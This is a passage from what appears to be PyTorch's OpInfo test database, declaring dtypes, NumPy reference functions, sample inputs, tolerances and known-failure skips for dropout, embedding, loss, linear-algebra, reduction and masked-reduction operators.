# Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (4, 5) sample_inputs_func=partial(sample_inputs_dropout, train=True, valid_input_dim=(4, 5)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="without_train", ref=_NOTHING, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=partial(sample_inputs_dropout, train=False), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.one_hot", ref=reference_one_hot, supports_out=False, dtypes=_dispatch_dtypes((torch.int64,)), sample_inputs_func=sample_inputs_one_hot, ), OpInfo( "nn.functional.embedding", aten_backward_name="embedding_dense_backward", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. op=lambda weight, idx, **kwargs: torch.nn.functional.embedding(idx, weight, **kwargs), dtypes=floating_types_and(torch.bfloat16, torch.float16), sample_inputs_func=sample_inputs_embedding, error_inputs_func=error_inputs_embedding, supports_forward_ad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Reference: https://github.com/pytorch/pytorch/issues/67084 DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'), # Not a problem: embedding does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), supports_expanded_weight=True, supports_out=False, ), OpInfo( "nn.functional.embedding_bag", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. 
op=lambda weight, idx, **kwargs: torch.nn.functional.embedding_bag(idx, weight, **kwargs), dtypes=floating_types_and(torch.float16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), # backward is not supported for mode `max` and dtype `bfloat16` backward_dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_embedding_bag, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Not a problem: embedding_bag does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', device_type='cpu'), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, supports_gradgrad=False, ), UnaryUfuncInfo( "nn.functional.softplus", aten_backward_name='softplus_backward', ref=reference_softplus, sample_kwargs=lambda device, dtype, input: ({'beta': 3, 'threshold': .2}, {'beta': 3, 'threshold': .2}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'beta': 3, 'threshold': .2}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), decorators=( DecorateInfo( toleranceOverride ({ torch.half: tol(atol=1e-2, rtol=1e-2), torch.bfloat16: tol(atol=1e-2, rtol=1e-2), }), 'TestUnaryUfuncs'), ), ), OpInfo( "linalg.tensorinv", ref=np.linalg.tensorinv, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorinv, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagmaAndNoCusolver], ), OpInfo( "linalg.tensorsolve", ref=lambda a, b, dims=None: np.linalg.tensorsolve(a, b, axes=dims), dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorsolve, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagma], ), OpInfo( "nn.functional.mse_loss", aten_backward_name='mse_loss_backward', ref=loss_reference_reduction_wrapper(lambda input, target: (input - target) ** 2), sample_inputs_func=sample_inputs_loss, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.float16), backward_dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), ), OpInfo( "nn.functional.grid_sample", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, sample_inputs_func=sample_inputs_grid_sample, supports_gradgrad=False, gradcheck_nondet_tol=1e-15), OpInfo( "argwhere", ref=np.argwhere, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, sample_inputs_func=sample_inputs_argwhere, ), ReductionOpInfo( 'all', identity=True, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.all), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'any', identity=False, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.any), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'amax', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amax), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'amin', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amin), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'argmax', supports_multiple_dims=False, supports_autograd=False, assert_jit_shape_analysis=True, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'argmin', supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), 
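        # np.argmax/np.argmin historically take no keepdims argument (hence
        # supports_keepdims=False on these refs; assumes the pinned NumPy
        # predates 1.22), while the torch variants do support it:
        #   >>> torch.randn(2, 3).argmin(dim=1, keepdim=True).shape
        #   torch.Size([2, 1])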
ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'count_nonzero', identity=0, supports_out=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_reduction_count_nonzero, ref=reference_reduction_numpy(np.count_nonzero), skips=( # FIXME: count_nonzero does not accept keepdim kwarg DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_single_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_unsorted_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_offbounds_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), ), ), ReductionOpInfo( 'mean', nan_policy='propagate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, # FIXME: mean needs 'dim' parameter when using the 'out' overload. # Adding it with 'generate_args_kwargs' does not work, since these also get passed # onto the reference implementations. supports_out=False, assert_autodiffed=True, assert_jit_shape_analysis=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.mean), error_inputs_func=error_inputs_mean, skips=( # FIXME: mean does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: mean reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: mean does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'nanmean', nan_policy='omit', assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_nan_reduction(supports_multiple_dims=True), ref=reference_reduction_numpy(np.nanmean), skips=( # AssertionError: False is not true : # Failure in testing nodes' autodifferentiation. 
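        # Semantics checked against np.nanmean (illustrative):
        #   >>> torch.tensor([1., float('nan'), 3.]).nanmean()
        #   tensor(2.)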
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: prod reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', device_type='cuda', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'std', nan_policy='propagate', supports_out=False, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.std), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'var', nan_policy='propagate', supports_out=False, assert_autodiffed=True, promotes_int_to_float=True, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.var), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'prod', identity=1, nan_policy='propagate', supports_multiple_dims=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_int64=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, 
dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_prod, ref=reference_reduction_numpy(np.prod), skips=( # FIXME: prod does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: prod reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: prod does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16, torch.complex64]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.uint8, torch.float16, torch.complex64]), ), ), ReductionOpInfo( 'sum', identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), ref=reference_reduction_numpy(np.sum), skips=( # FIXME: sum does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: sum does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.float16]), ), ), ReductionOpInfo( 'nansum', identity=0, nan_policy='omit', supports_out=True, promotes_int_to_int64=True, dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.nansum), skips=( # FIXME: nansum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: flaky test so skipped instead of xfailed # possibly bad low precision reference in numpy DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), ), ), ReductionOpInfo( '_masked.sum', ref=reference_reduction_numpy(np.sum), method_variant=None, identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # 
FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestReductions', 'test_ref_small_input'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction ), ReductionOpInfo( '_masked.prod', ref=reference_reduction_numpy(np.prod), method_variant=None, identity=1, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, # FIXME: "prod_cpu" not implemented for 'BFloat16' # FIXME: "prod_cpu" not implemented for 'Half' dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32),), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_ref_duplicate_values'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction, ), OpInfo( '_masked.cumsum', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... 
use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), OpInfo( '_masked.cumprod', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), ReductionOpInfo( '_masked.amax', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amax), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: amax reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.amin', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amin), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: amax reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... 
(used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmax', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmax DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmin', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmin DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... 
use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.mean', ref=reference_reduction_numpy(np.mean) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), skips=( DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_duplicate_values', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_small_input', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), OpInfo( '_masked.median', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... 
use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_masked_softmax, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.norm', identity=0, method_variant=None, nan_policy='propagate', supports_out=False, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # torch.jit.frontend.NotSupportedError: Compiled functions # can't take variable number of arguments or use # keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 